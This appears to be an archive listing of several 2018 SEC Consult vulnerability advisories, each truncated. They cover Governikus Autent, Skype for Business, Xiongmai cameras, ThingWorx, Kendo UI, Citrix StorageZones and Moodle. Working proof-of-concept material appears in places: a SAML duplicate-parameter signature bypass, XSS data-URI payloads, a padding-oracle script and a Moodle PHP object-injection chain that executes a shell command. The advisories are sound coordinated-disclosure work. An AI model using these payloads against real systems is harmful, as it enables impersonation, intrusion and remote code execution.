SEC Consult SA-20181121-0 :: Signature Bypass / Authentication Bypass in Governikus Autent SDK
An additional blog post has been published on this topic as well:
English version: https://r.sec-consult.com/governikus
German version: https://r.sec-consult.com/gov
SEC Consult Vulnerability Lab Security Advisory < 20181121-0 >
===
title: Signature Bypass / Authentication Bypass
product: Governikus Autent SDK
vulnerable version: <=3.8.1
fixed version: 3.8.1.2
CVE number: -
impact: critical
homepage: https://www.governikus.de/
found: 2018-06
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
German original, translated to English: "In the course of digitization,
electronic
identities have become indispensable. At the same time, the requirements for
protection, handling with regard to legal security and the federation of
electronic identities are increasing. With Governikus Autent, server and client
components are available to ensure authentication through electronic identities.
Governikus Autent meets all the requirements of a modern identity management
solution.”
Source:
https://www.governikus.de/produkte-loesungen/governikus-autent-und-ausweisapp2/
Business recommendation:
During a short crash test SEC Consult identified a critical vulnerability in the
Governikus Autent SDK nPA authentication code (German id card authentication).
This vulnerability could allow an attacker to impersonate any German citizen
on a vulnerable web application.
SEC Consult recommends to immediately apply the workaround described below or
apply the patch provided by the vendor. Moreover, SEC Consult recommends web
application providers to check historic log files for evidence of this attack.
SEC Consult recommends conducting a thorough source code security review on
the Governikus Autent components as they are integral for the security of many
web applications.
Vulnerability overview/description:
---
The software component tested is used by web applications to integrate nPA
authentication (authentication using the German official id document).
As the last step of an authentication transaction, the web application the user
authenticates against receives a string containing all relevant data about the
citizen (e.g. first name, last name). As this string is signed by a trusted
party (an eID server), the application can verify the authenticity of this
string.
The component in the web application that is supposed to verify this signature
can be tricked into accepting a string that has been modified. An attacker that
has acquired a single legitimately signed string can use this to authenticate
as any German citizen to any web application that trusts the eID server's
signature. An attacker could acquire such a signed string by hosting a web
application and tricking a victim to authenticate, by gaining access to a
signed string sent to a legitimate web application (man-in-the-middle attack,
getting access to the access log) or by authenticating against a web application
using his own id document.
Proof of concept:
-
1. Signature Bypass
During the last step of the NPA transaction, the user is redirected to the
SAML receiver of the web application she tried to authenticate against. The SAML
response is sent as a URL parameter:
https:///?SAMLResponse==<...>==
According to the demo application, the first verification a SAML receiver is
meant to do is call the method HttpRedirectUtils.checkQueryString passing the
query string (as it is returned by request.getQueryString()). If this method
returns false, the signature could not be verified.
This method internally deconstructs the query string into individual parameters,
reconstructs the query string and then verifies the signature.
If however, the query string contains multiple parameters of the same name, only
the last occurrence of a parameter is built into the query string the signature
is verified against. Therefore, if a query string is constructed like following,
the first SAML response is ignored during signature verification:
...?SAMLResponse==...
Afterwards, when the SAML response is processed, the application is likely to
use the method ServletRequest.getParameter() to retrieve the SAML response (the
demo application which is meant to show the integration of the library also
does this). As per the specification of this method, the application server is
supposed to return the first parameter value, if multiple parameters with the
same name were sent.
Thus, the signature is verified against t
SEC Consult SA-20181116-0 :: Multiple critical vulnerabilities in Miss Marple Enterprise Edition
SEC Consult Vulnerability Lab Security Advisory < 20181116-0 >
===
title: Multiple critical vulnerabilities
product: Miss Marple Enterprise Edition
vulnerable version: <2.0
fixed version: 2.0
CVE number: CVE-2018-19233, CVE-2018-19234
impact: Critical
homepage: www.comparex-group.com
found: 2018-05-29
by: Marius Schwarz (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"As a global IT company with thirty years of experience, COMPAREX is one of the
world’s leading IT service providers and no. 1 software license management
company in the EMEA markets. COMPAREX develops innovative services that support
management and leverage software products, leading to an overall improvement
of workforce productivity. COMPAREX serves corporate customers spanning from
small businesses to large international corporations as well as the public
institutions supporting every customer during their digital journey towards
productivity optimization. The portfolio has a solid foundation in license
management, software procurement and cloud services. Substantial professional
and managed services complete the portfolio to support customers with services
tailored to their business demands."
Source: https://comparexusa.com/about-us/about/
Business recommendation:
The vendor provides a patch and users of this product are urged to
immediately upgrade to the latest version available.
Vulnerability overview/description:
---
Application overview:
Miss Marple is an inventory software that consists of a client and a server
part. The client (agent) is gathering system information and uploads the
results to a remote server in an encrypted ZIP file.
1) Hardcoded AES key (CVE-2018-19233)
A username and an encrypted password were identified in the Miss Marple
Inventory Agent configuration file. By decompiling the binary, the encryption
method was identified as AES-256 with a hardcoded key and initialization vector.
The credentials are used to deploy the inventory files to a remote server.
2) Uploading arbitrary files
There are two ways an attacker can upload arbitrary files to the server.
2.1) Patching the application binary to bypass the ZIP file extension check
Using this method, it is possible to upload any file to the server, even if
the credentials are unknown to the attacker! This works because every file in
a specific directory gets uploaded, as long as the file has the correct file
extension. This can be bypassed because the file extension is only checked on
the client side and not on the server side. Patching the binary is done by
replacing the extension string with the file extension of the attackers
file eg. ".aspx" in the MMIA.exe binary itself.
2.2) Using cURL to upload arbitrary files
If the credentials are known to the attacker, it is possible to use tools like
cURL to upload arbitrary files to the remote server.
Both ways can be used by an attacker to upload a web-shell to the server and
execute arbitrary commands.
3) Missing update validation (CVE-2018-19234)
Besides the Miss Marple Inventory Agent, an Miss Marple Updater Service is
running on all clients. This service checks for new versions on the same server.
If the files are uploaded to the right directory on the server, the updater will
download and execute them with the highest privileges (NT Authority\SYSTEM)
without
validating the binaries.
This can also be used for escalating privileges on the client. By uploading a
web-shell using the methods described in vulnerability 2, an attacker gets
sufficient write permissions to access the update directory and to place
malicious
files on the server. This will execute arbitrary code on all clients using Miss
Marple.
Proof of concept:
-
1) Hardcoded AES key (CVE-2018-19233)
No proof of concept will be provided.
2) Uploading arbitrary files
2.1) No proof of concept will be provided. E.g. the Unicode string for ".zip"
just
has to be replaced with the file extension for the uploaded web-shell.
2.2) Using cURL to upload arbitrary files
It is possible to upload arbitrary files using cURL and the credentials obtained
in 1).
3) Missing update validation (CVE-2018-19234)
No proof of concept will be provided.
Vulnerable / tested versions:
-
The following versions have been tested and found to be vulnerable:
Miss Marple Inventory Agent / Miss Marple Updater Service 1.13
Vendor contact timeline:
2018-06-
SEC Consult SA-20181114-0 :: Denial of Service in Microsoft Skype for Business
SEC Consult Vulnerability Lab Security Advisory < 20181114-0 >
===
title: Denial of Service
product: Microsoft Skype for Business 2016 / Lync 2013
vulnerable version: Microsoft Skype for Business 2015 (Lync 2013) before
v15.0.5075.1000
Skype for Business 2016: before v16.0.4756.1000
fixed version: Microsoft Skype for Business 2015 (Lync 2013)
v15.0.5075.1000
Skype for Business 2016 v16.0.4756.1000
CVE number: CVE-2018-8546
impact: Medium
homepage: https://www.skype.com/en/business/
found: 08/2018
by: Sabine Degen (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Skype for Business (formerly Microsoft Office Communicator and Microsoft
Lync) is an instant messaging client used with Skype for Business Server or
with Skype for Business Online (available with Microsoft Office 365).
Skype for Business is enterprise software."
Source: https://en.wikipedia.org/wiki/Skype_for_Business
Business recommendation:
Assess the impact of this vulnerability on your business. The patch
provided by Microsoft should be installed immediately. Especially if
Skype for Business is being used for external communication.
Vulnerability overview/description:
---
A large number of emojis (e.g. ~800 kittens) received in one message by the
Skype
For Business client freezes the program for a few seconds. This can be
exploited to perform Denial of Service attacks against Skype for Business
users and compromises the availability of the program.
For example, an attacker can continuously send such messages to the chat
window of a meeting room in order to freeze the program for all participants
and prevent them from using the chat or seeing the video.
Note that the sound and video stream is handled by a separate thread and
therefore are not affected (e.g. killed), only the functions related to
graphical user interface become unusable.
Proof of concept:
-
After sending a big amount of emojis (~800 kittens) to a Skype for Business
chat, the program freezes for a few seconds while rendering the chat window.
Continuously sending emojis will make the GUI unusable for the user.
Ongoing conference calls are not affected or interrupted.
The following SIP packet illustrates the attack.
MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu
SIP/2.0
Via: SIP/2.0/tls 127.0.0.1:7490
From: ;tag=82254700;epid=e67b0162bec8
To: ;tag=5c302cb624;epid=15347556e6
Max-Forwards: 70
CSeq: 12 MESSAGE
User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0)
Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x
Route:
Contact:
Content-Type: text/plain;
charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA
Content-Length: 4420
Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications
Service", targetname="*redacted*", crand="1126134f", cnum="29",
response="*redacted*"
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) [...]
Vulnerable / tested versions:
-
The following versions have been identified as vulnerable which were
the latest versions available at the time of the test:
* Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013
* Skype for Business 2016 MSO (16.0.93).64-Bit,
Both versions were running on Windows 10 Pro.
According to the vendor, all previous versions are affected:
* Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
* Skype for Business 2016: before v16.0.4756.1000
Vendor contact timeline:
2018-08-02: Vulnerability details submitted to Microsoft,
MSRC Case 47060 assigned
2018-08-28: Asking for a status update
2018-08-30: Vendor: issue has been reproduced, solution to block the user
provided
2018-08-31: Follow-up questions why DoS is not categorized as security issue
as the provided workaround is not effective for attacks already
in progress
2018-08-31: Vendor: decided to f
SEC Consult SA-20181009-0 :: Remote Code Execution via XMeye P2P Cloud in Xiongmai IP Cameras, NVRs and DVRs incl. 3rd party OEM devices (CVE-2018-17915, CVE-2018-17917, CVE-2018-17919)
SEC Consult also published a blog post regarding the identified security issues
with further background information:
Blog: https://r.sec-consult.com/xmeye
SEC Consult Vulnerability Lab Security Advisory < 20181009-0 >
===
title: Remote Code Execution via XMeye P2P Cloud
product: Xiongmai IP Cameras, NVRs and DVRs
incl. 3rd party OEM devices
vulnerable version: see below
fixed version: -
CVE number: CVE-2018-17915, CVE-2018-17917, CVE-2018-17919
impact: Critical
homepage: http://www.xiongmaitech.com/en/
found: 2018-03-05
by: Stefan Viehböck (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Hangzhou Xiongmai Technology Co., Ltd concentrates on security surveillance,
Video intelligent research and development. We devote ourselves to
providing good products, technical services for manufacturers,
wholesaler and service provider, in order to offer better experience
for our customers. We are global leading providers in security video
products and technology. Established from 2009, many years development,
the headquarter of XM locate in Yinhu Innovation Center, Fuyang
district, Hangzhou now. Total registered capital reach to 60 million.
Now we owns nearly 2000 employees including a strong R team (more
than 300 experienced engineers)."
Source: http://www.xiongmaitech.com/en/index.php/about/company/18
Business recommendation:
SEC Consult has identified highly critical vulnerabilities in Xiongmai
products and the "XMeye P2P Cloud" feature which is being used in many
3rd party OEM devices as well.
The vendor does not provide proper mitigations and hence it is recommended
not to use any products associated with the XMeye P2P Cloud until
all of the identified security issues have been fixed and a thorough
security analysis has been performed by professionals.
Vulnerability overview/description:
---
1) Predictable XMEye Cloud IDs (CVE-2018-17915)
All Xiongmai devices come with a feature called "XMeye P2P Cloud". It is a
proprietary, UDP-based protocol that allows users to access their IP cameras or
NVRs/DVRs via the internet. The feature is enabled by default, no setup by the
user is required.
The device initiates and keeps a connection to a Xiongmai cloud server.
All connections between clients and the devices are established via Xiongmai
cloud servers. This approach allows users to connect to devices that are behind
firewalls, NATed etc.
The unique, per-device identifier is the cloud ID. It is a 16 character long
hexadecimal string (e.g. f7e708f21de0fde0).
Anyone who knows the device identifier and the admin credentials can establish a
connection to a device using the XMEye apps (Android, iOS) or a "VMS" desktop
application.
The Cloud ID may be unique, but it is not random. It is derived (at boot time)
from the device MAC address using a few simple operations (see
get_sn_from_mac())
below.
An attacker can enumerate potential MACs/cloud IDs and find valid ones.
Then use the weak default credentials to log in. This allows the attacker to
watch the video feed, change the device configuration and possibly gain remote
code execution using other vulnerabilities.
The XMEye functionality allows an attacker to attack devices that are behind
firewalls, NATed networks etc.
MAC addresses have a well defined structure: 3-octet OUI (Vendor) + 3-octet NIC
ID
OUIs are assigned by the IEEE. Interestingly Xiongmai does not own an OUI, but
instead uses the OUIs of other companies.
The following OUIs are used by Xiongmai devices (OUIs based on internet
research,
scanning, company names based on [1]):
001210 WideRay Corp
001211 Protechna Herbst GmbH & Co. KG
001212 PLUS Corporation
001213 Metrohm AG
001214 Koenig & Bauer AG
001215 iStor Networks, Inc.
001216 ICP Internet Communication Payment AG
001217 Cisco-Linksys, LLC
001218 ARUZE Corporation
003E0B - Not assigned
We developed a cloud ID scanner that queries the Xiongmai cloud server. The
responses indicate if there is a device online that uses the given cloud ID,
plus provide the IP of a Xiongmai Cloud hop server that is geographically
close to the device. One query is one UDP packet.
We scanned 0.02% of the devices (random choice) in each OUI range (16 Million
devices per range) and extrapolated the results.
OUI: 001210; IDs checked 3,365; Devices online 3; Success rate: 0.1%;
extrapolated devices online: 14,957
OUI: 001211; IDs checked 3,363; Devices online 9; Success rate:
SEC Consult SA-20181001-0 :: Password disclosure vulnerability & XSS in PTC ThingWorx (CVE-2018-17216, CVE-2018-17217, CVE-2018-17218)
SEC Consult Vulnerability Lab Security Advisory < 20181001-0 >
===
title: Password disclosure vulnerability & XSS
product: PTC ThingWorx
vulnerable version: 6.5-7.4, 8.0.x, 8.1.x, 8.2.x
fixed version: see Solution section
CVE number: CVE-2018-17216, CVE-2018-17217, CVE-2018-17218
impact: critical
homepage: https://www.ptc.com
found: 2018-03-13
by: M. Tomaselli (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"ThingWorx is more than an IoT platform; it provides the functionality,
flexibility and scalability that businesses need to drive industrial
innovation─including the ability to source, contextualize and synthesize
data while orchestrating processes and delivering powerful web, mobile
and AR experiences."
Source: https://www.ptc.com/en/thingworx8
Business recommendation:
ThingWorx allows to configure Things to communicate with other services over
several protocols (e.g. LDAP integration via a DirectoryServices Thing). In
order to communicate with services that require authentification, ThingWorx
provides functionality to associate credentials to a Thing.
During a brief audit it was noticed that ThingWorx Composer leaks the
following sensitive data:
1) The PBKDF2WithHmac512 password hash of a user Thing
2) The AES encrypted password of several Things containing password attributes
Furthermore, the password used for encryption is hard-coded and thus identical
along all installations.
Besides the above mentioned vulnerabilities a reflected cross-site scripting
vulnerability was identified in the ThingWorx SQUEAL search function.
The vendor provides a patch which should be installed immediately.
It is recommended to perform further thorough security audits as the product
may be affected by other potential security vulnerabilities.
Vulnerability overview/description:
---
1) Disclosure of User Password Hashes to Privileged Users (CVE-2018-17216)
ThingWorx discloses the PBKDF2WithHmac512 hashed passwords of its application
users when doing exports with an administrative account. This enables an
attacker to conduct offline brute-force or dictionary attacks against the
obtained password hashes.
2) Disclosure of Encrypted Credentials and Use of Hard-Coded Passwords
(CVE-2018-17217)
A critical information disclosure vulnerability leaks the AES encrypted
passwords of services configured within ThingWorx. Due to a hard-coded
master password in the SecureData class, an attacker is able to decrypt the
obtained passwords which grants him access to other services. The AES encrypted
password gets disclosed in the server response when a user/attacker visits a
Thing that contains credentials.
3) Reflected Cross-Site Scripting (CVE-2018-17218)
The JavaScript part of the ThingWorx SQUEAL search functionality
(searchExpression parameter) which is responsible for parsing the obtained JSON
response fails to properly sanitize user supplied input. If the victim views
attacker-prepared content (e.g. on a website or in an HTML email) an attacker
is able to execute arbitrary actions in the context of its victims' sessions.
Proof of concept:
-
The proof of concept has been removed from this advisory.
Vulnerable / tested versions:
-
The vulnerabilities have been verified to exist in version 8.0.1-b39 which was
the latest version available at the time of the test.
The vendor provided further affected version information. See the Solution
section for reference.
Vendor contact timeline:
2018-03-14: Contacting vendor through email
2018-03-16: Advisory sent to vendor via encrypted mail
2018-03 - 2018-09: Multiple phone calls with PTC R department
discussing release & multi-party disclosure
2018-08-15: Vendor provided private notifications to customers to give
45 days to upgrade
2018-10-01: Coordinated release of SEC Consult advisory
Solution:
-
Best recommendation is to upgrade to the latest version of ThingWorx
to version 8.3.2 (at time of writing).
For newer verions, the issue of the hard coded password has been fixed
and the SQUEAL function removed.
The minimum upgrade to obtain mitigations for all 3 issues depends
on the version of ThingWorx in use.
For ThingWorx versions 6.5-7.4, upgrade to 7.4.14+
For ThingWorx version 8.0.x, upgrade to 8.0.12+
For ThingWorx version 8.1.x, upgrade to 8.1.7+
For ThingWorx version 8.2.x, upgrade to 8.2.4+
The vendor always recommends upgradin
SEC Consult SA-20180926-0 ::
SEC Consult Vulnerability Lab Security Advisory < 20180926-0 >
===
title: Stored Cross-Site Scripting
product: Progress Kendo UI Editor
vulnerable version: v2018.1.221
fixed version: none, see workaround
CVE number: CVE-2018-14037
impact: medium
homepage: https://www.progress.com/kendo-ui
found: 2018-04-23
by: M. Tomaselli (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"The Editor allows users to create rich text content by means of a WYSIWYG
interface. This HTML5 widget outputs identical HTML across all major browsers,
follows accessibility standards and provides an API for content manipulation.
The generated widget value is comprised of XHTML markup."
https://www.telerik.com/kendo-ui/editor
Business recommendation:
SEC Consult recommends to implement the workarounds provided by the vendor.
Vulnerability overview/description:
---
The demo application of the Kendo UI Editor which is hosted at
https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function
which should protect from cross site scripting. However, the implemented
Sanitizer fails to catch certain payloads which allow an attacker to execute
JavaScript in the context of the editor itself.
Proof of concept:
-
The following, incomplete list, of payloads can be used to trigger an alert
box in the API demo application of the Kendo UI Editor:
https://demos.telerik.com/kendo-ui/editor/api
After a click on the button the setValue function on line 513 of the beautified
"api.js" is called:
var setValue = function () {
editor.value($("#value").val());
};
The value function is implemented in line 64383 of the beautified "kendo.all.js"
file and defined as:
value: function (html) {
var body = this.body, editorNS = kendo.ui.editor, options =
this.options, currentHtml = editorNS.Serializer.domToXhtml(body,
options.serialization);
if (html === undefined) {
return currentHtml;
}
if (html == currentHtml) {
return;
}
editorNS.Serializer.htmlToDom(html, body, options.deserialization);
this.selectionRestorePoint = null;
this.update();
this.toolbar.refreshTools();
},
In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom()
function is called which can be seen in the excerpt below:
var Serializer = {
toEditableHtml: function (html) {
return (html || '').replace(//g,
'').replace(/<(\/?)script([^>]*)>/gi,
'<$1k:script$2>').replace(/]*)>/gi, function (match) {
return match.replace(onerrorRe, '');
}).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi,
'$1').replace(/^<(table|blockquote)/i, br +
'<$1').replace(/^[\s]*(|\u00a0)/i,
'$1').replace(/<\/(table|blockquote)>$/i,
'' + br);
},
Although certain payloads are detected and sanitized by the function, the
implemented protection fails to detect the data uri payload. The payload is
added unescaped to the editor DOM after several other functions calls.
Vulnerable / tested versions:
-
The following version has been identified to be vulnerable:
* v2018.1.221
Vendor contact timeline:
2018-05-02: Contacting vendor through email for security contact
2018-05-02: Contact person requests to obtain advisory via unencrypted mail
2018-05-08: Advisory delivered through unencrypted email to vendor
2018-05-29: Contacting vendor for current status and informing them about the
publishing date
2018-07-02: Reminded the vendor that the advisory will be published soon
2018-07-02: Multiple emails exchanged, vendor demands that customers need to
issue a support ticket on this case
2018-07-03: Telling them that it is a security issue they already know two
months
without seemingly acting upon it.
Vendor: product managers have been informed and will contact us;
no further info
2018-07-11: Asking vendor again for a status update & patch information
2018-07-11: Vendor: "Thank you for following up. I have sent this to the product
team to take into consideration. They will be following up with you
as
they may need. We appreciate you following up regarding this
request."
2018-07-12: Detailed answer from vendor regarding workaround
2018-07-13: Requested CVE num
Re: SEC Consult SA-20180926-0 :: Stored Cross-Site Scripting in Progress Kendo UI Editor
here with correct email subject :)
On 9/26/18 2:17 PM, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20180926-0 >
> ===
> title: Stored Cross-Site Scripting
> product: Progress Kendo UI Editor
> vulnerable version: v2018.1.221
> fixed version: none, see workaround
> CVE number: CVE-2018-14037
> impact: medium
>homepage: https://www.progress.com/kendo-ui
> found: 2018-04-23
> by: M. Tomaselli (Office Munich)
> SEC Consult Vulnerability Lab
>
> An integrated part of SEC Consult
> Europe | Asia | North America
>
> https://www.sec-consult.com
>
> ===
>
> Vendor description:
> ---
> "The Editor allows users to create rich text content by means of a WYSIWYG
> interface. This HTML5 widget outputs identical HTML across all major browsers,
> follows accessibility standards and provides an API for content manipulation.
> The generated widget value is comprised of XHTML markup."
>
> https://www.telerik.com/kendo-ui/editor
>
>
> Business recommendation:
>
> SEC Consult recommends to implement the workarounds provided by the vendor.
>
>
> Vulnerability overview/description:
> ---
> The demo application of the Kendo UI Editor which is hosted at
> https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function
> which should protect from cross site scripting. However, the implemented
> Sanitizer fails to catch certain payloads which allow an attacker to execute
> JavaScript in the context of the editor itself.
>
>
> Proof of concept:
> -
> The following, incomplete list, of payloads can be used to trigger an alert
> box in the API demo application of the Kendo UI Editor:
> https://demos.telerik.com/kendo-ui/editor/api
>
>
> data="data:text/html;base64,PHNjcmlwdD5hbGVydCgic2VjdGVzdCIpPC9zY3JpcHQ+">
>
> HTTP-EQUIV="refresh"
> CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
>
>
>
> After a click on the button the setValue function on line 513 of the
> beautified
> "api.js" is called:
>
> var setValue = function () {
> editor.value($("#value").val());
> };
>
>
> The value function is implemented in line 64383 of the beautified
> "kendo.all.js"
> file and defined as:
>
> value: function (html) {
> var body = this.body, editorNS = kendo.ui.editor, options =
> this.options, currentHtml = editorNS.Serializer.domToXhtml(body,
> options.serialization);
> if (html === undefined) {
> return currentHtml;
> }
> if (html == currentHtml) {
> return;
> }
> editorNS.Serializer.htmlToDom(html, body,
> options.deserialization);
> this.selectionRestorePoint = null;
> this.update();
> this.toolbar.refreshTools();
> },
>
> In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom()
> function is called which can be seen in the excerpt below:
>
> var Serializer = {
> toEditableHtml: function (html) {
> return (html || '').replace(//g,
> '').replace(/<(\/?)script([^>]*)>/gi,
> '<$1k:script$2>').replace(/]*)>/gi, function (match) {
> return match.replace(onerrorRe, '');
> }).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi,
> '$1').replace(/^<(table|blockquote)/i, br +
> '<$1').replace(/^[\s]*(|\u00a0)/i,
> '$1').replace(/<\/(table|blockquote)>$/i,
> '' + br);
> },
>
> Although certain payloads are detected and sanitized by the function, the
> implemented protection fails to detect the data uri payload. The payload is
> added unescaped to the editor DOM after several other functions calls.
>
>
> Vulnerable / tested versions:
> -
> The following version has been identified to be vulnerable:
> * v2018.1.221
>
>
> Vendor contact timeline:
>
> 2018-05-02: Contacting vendor through email for security contact
> 2018-05-02: Contact person requests to obtain advisory via unencrypted mail
> 2018-05-08: Advisory delivered through unencrypted email to vendor
> 2018-05-29: Contacting vendor for curren
SEC Consult SA-20180924-0 :: Multiple Vulnerabilities in Citrix StorageZones Controller
SEC Consult Vulnerability Lab Security Advisory < 20180924-0 >
===
title: Multiple Vulnerabilities
product: Citrix StorageZones Controller
vulnerable version: all versions before 5.4.2
fixed version: 5.4.2
CVE number: CVE-2018-16968, CVE-2018-16969
impact: Medium
homepage: https://www.citrix.com/
found: 2018-08
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"ShareFile is a file sharing service that enables users to easily and securely
exchange documents. ShareFile Enterprise provides enterprise-class service and
includes StorageZones Controller and the User Management Tool. ShareFile
StorageZones Controller extends the ShareFile software as a service (SaaS)
cloud storage by providing your ShareFile account with private data storage,
referred to as StorageZones for ShareFile Data. [...]."
URL: https://docs.citrix.com/en-us/storagezones-controller/5-0.html
Business recommendation:
Users of this product are advised to install the security patch provided by
Citrix.
The vulnerabilities identified suggest that no sufficient technical security
audit has yet been conducted on the Citrix StorageZones Controller. SEC Consult
recommends Citrix to conduct such an audit.
Vulnerability overview/description:
---
The Citrix StorageZones Controller exposes resources that are typically only
available to the internal network (e.g. CIFS Windows shares) to clients
connecting from the Internet.
In order to hide internal network paths from the user and in order to only allow
access to paths specifically allowed by the administrator, internal network
paths are encrypted. E.g. if an administrator wants to allow access to an UNC
path (e.g. \\testhost\testshare\testdir) this string is encrypted and provided
to the client. When the user calls the API to e.g. list the contents of this
directory, the StorageZones Controller returns the encrypted absolute paths for
each directory entry. This way, the absolute internal paths are always hidden
from the user.
1) Improper Access Restrictions
Citrix StorageZone Controller offers users a functionality to convert UNC paths
into their encrypted form. Therefore, users are able to access any UNC paths
accessible by the StorageZones Controller.
When providing access to a network share, the StorageZones Controller
impersonates the user. Therefore, unauthorized access to network shares is not
possible.
However, Citrix StorageZones Controller internally does not distinguish between
UNC-paths (e.g. \\testhost\testshare) and local paths (e.g. C:\Windows).
Therefore, users may access (e.g. read, write, delete) local paths for which
they have appropriate NTFS permissions.
Note: Citrix StorageZones allows an administrator to define the paths exposed by
the StorageZones Controller. By configuring this setting an administrator can
restrict access to only network paths. The configuration page incorrectly states
that a value of "*" (the default value) "allows connections to all hosts on the
internal network", while in fact it also allows access to local paths.
2) Padding Oracle
The encryption mechanism used by the Citrix StorageZones Controller is
vulnerable to a padding oracle attack. This allows an attacker to partly decrypt
or potentially modify internal paths.
3) Path Traversal
The upload functionality is vulnerable to a path traversal attack if the
preconditions to exploit the vulnerability #1 are met. In practice this
vulnerability has a similar effect as vulnerability #1.
Proof of concept:
-
1) Improper Access Restrictions
The following URL demonstrates how local paths can be encrypted:
https:///cifs/v3/Items/ByPath?path=c:\
The following URL demonstrates how e.g. the contents of the directory can be
listed:
https:///cifs/v3/Items()?$expand=Children
2) Padding Oracle
The following script demonstrates how encrypted internal paths can partly be
decrypted. It may also be possible to partly modify encrypted paths (this has
not been verified).
snip
import sys
sys.path.append('python-paddingoracle')
from paddingoracle import BadPaddingException, PaddingOracle, xor
from base64 import b64encode, b64decode
from urllib import quote, unquote
import requests
import socket
import time
import getpass
URL = 'http:///'
AUTH = (raw_input('User: '),
getpass.getpass('Password: '))
CIPHER = ''
class PadBuster(PaddingOracle):
def __init__(self, **kwargs):
super(PadBuster, self).__i
SEC Consult SA-20180918-0 :: Remote Code Execution via PHP unserialize in Moodle open-source learning platform
SEC Consult Vulnerability Lab Security Advisory < 20180918-0 >
===
title: Remote Code Execution via PHP unserialize
product: Moodle - Open-source learning platform
vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and
earlier unsupported versions
fixed version: 3.5.2, 3.4.5, 3.3.8 and 3.1.14
CVE number: CVE-2018-14630
impact: critical
homepage: https://moodle.org/
found: 2018-07-08
by: Johannes Moritz (Office Berlin)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Moodle is a learning platform designed to provide educators, administrators
and learners with a single robust, secure and integrated system to create
personalised learning environments. Powering tens of thousands of learning
environments globally, Moodle is trusted by institutions and organisations
large and small, including Shell, London School of Economics,
State University of New York, Microsoft and the Open University. Moodle’s
worldwide numbers of more than 90 million users across both academic and
enterprise level usage makes it the world’s most widely used learning platform."
Source: https://moodle.org/about
Business recommendation:
The vendor provides a patch which should be installed immediately.
SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.
Vulnerability overview/description:
---
1) Remote Code Execution via PHP unserialize (CVE-2018-14630)
When importing a "drag and drop into text" (ddwtos) question in the legacy
Moodle XML format, the passed feedback answer is used unsanitized in an
unserialize() function, which leads to a PHP Object Injection vulnerability.
By providing a sophisticated PHP Object chain it is possible to leverage the
POI into a fully-blown arbitrary Remote Code Execution (RCE).
To exploit this vulnerability an attacker needs permissions to create a quiz
or at least be able to import questions. A user of the role teacher usually has
these permissions. However, students can also be assigned to the role teacher
for
a specific course.
Proof of concept:
-
1) Remote Code Execution via PHP unserialize (CVE-2018-14630)
In order to exploit this issue an attacker has to open Moodle's question bank
for a specific course and import the following Moodle XML file. The answer
feedback contains a sophisticated PHP object chain which only contains objects
from Moodles library. After the parsing process the command "echo `whoami`" is
being executed.
question name
O:15:"\\core\\lock\\lock":2:{s:3:"key";O:23:"\\core_availability\\tree":1:{s:8:"children";O:24:"\\core\\dml\\recordset_walk":2:{s:8:"callback";s:6:"system";s:9:"recordset";O:25:"question_attempt_iterator":2:
{s:4:"quba";O:26:"question_usage_by_activity":1:{s:16:"questionattempts";a:1:{s:4:"1337";s:13:"echo
`whoami`";}}s:5:"slots";a:1:{i:0;i:1337;s:8:"infinite";i:1;}
Vulnerable / tested versions:
-
The following version has been tested which was the most recent one at the
time of the test:
* 3.5.1+
According to the vendor, all previous versions are affected as well:
* 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions
Vendor contact timeline:
2018-07-08: Vulnerability identified, further analysis (credits to Robin
Peraglie
